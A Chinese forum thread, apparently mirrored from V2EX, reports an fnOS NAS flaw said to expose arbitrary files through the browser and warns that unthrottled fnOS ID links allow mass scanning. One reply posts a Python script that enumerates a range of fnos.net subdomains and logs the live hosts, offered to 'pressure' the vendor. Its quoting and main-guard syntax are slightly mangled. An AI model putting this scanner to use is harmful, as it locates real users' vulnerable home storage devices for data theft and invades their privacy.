GoForum › 🌐 V2EX
飞牛 OS 漏洞会导致 nas 上所有文件泄露
Gesar ·
2026-02-01 00:02 ·
0 次点赞 · 11 条回复
涉密的数据永远不要联网,很早以前我发过一个帖子: https://www.v2ex.com/t/1106691
这次飞牛漏洞可以通过浏览器访问任意文件。例子:
而且 fnos id 连接不受速度限制,也不需要验证码,攻击者可以脚本批量扫描获取大量用户文件。
11 条回复
@7789aa900 大部分人可能只知道被植入病毒,并不知道照片这些都会泄漏。我觉得数据远比机器本身更重要,难道不是吗?
chonge2018 · 2026-02-01 00:52
还是给人打个码吧😂
chonge2018 · 2026-02-01 00:52
还以为是测试的,假的呢
haoshuaiwang · 2026-02-01 00:57
来兄弟们一起给他点压力,你下我一下明天他就关掉 fn
import socket import ssl import time
PREFIXES = [“ww”] NUM_START = 6671 NUM_END = 8899 PORT = 443
TIMEOUT = 5 DELAY = 0.8
OUTPUT_FILE = “valid_fnid.txt”
_ssl_context = ssl.create_default_context()
def tcp_check_fnid(fnid: str) -> bool:
host = f"{fnid}.fnos.net"
try:
with socket.create_connection((host, PORT), timeout=TIMEOUT) as sock:
with _ssl_context.wrap_socket(sock, server_hostname=host):
return True
except Exception:
return False
def save_hit(fnid: str):
with open(OUTPUT_FILE, "a", encoding="utf-8") as f:
f.write(fnid + "\n")
def main():
total = len(PREFIXES) * (NUM_END - NUM_START)
checked = 0
for prefix in PREFIXES:
for num in range(NUM_START, NUM_END):
fnid = f"{prefix}{num}"
checked += 1
ok = tcp_check_fnid(fnid)
print(f"[{checked}/{total}] {fnid} {'OK' if ok else 'FAIL'}")
if ok:
save_hit(fnid)
time.sleep(DELAY)
if name == “main”:
main()
添加回复
你还需要 登录
后发表回复
要不你打个码呢……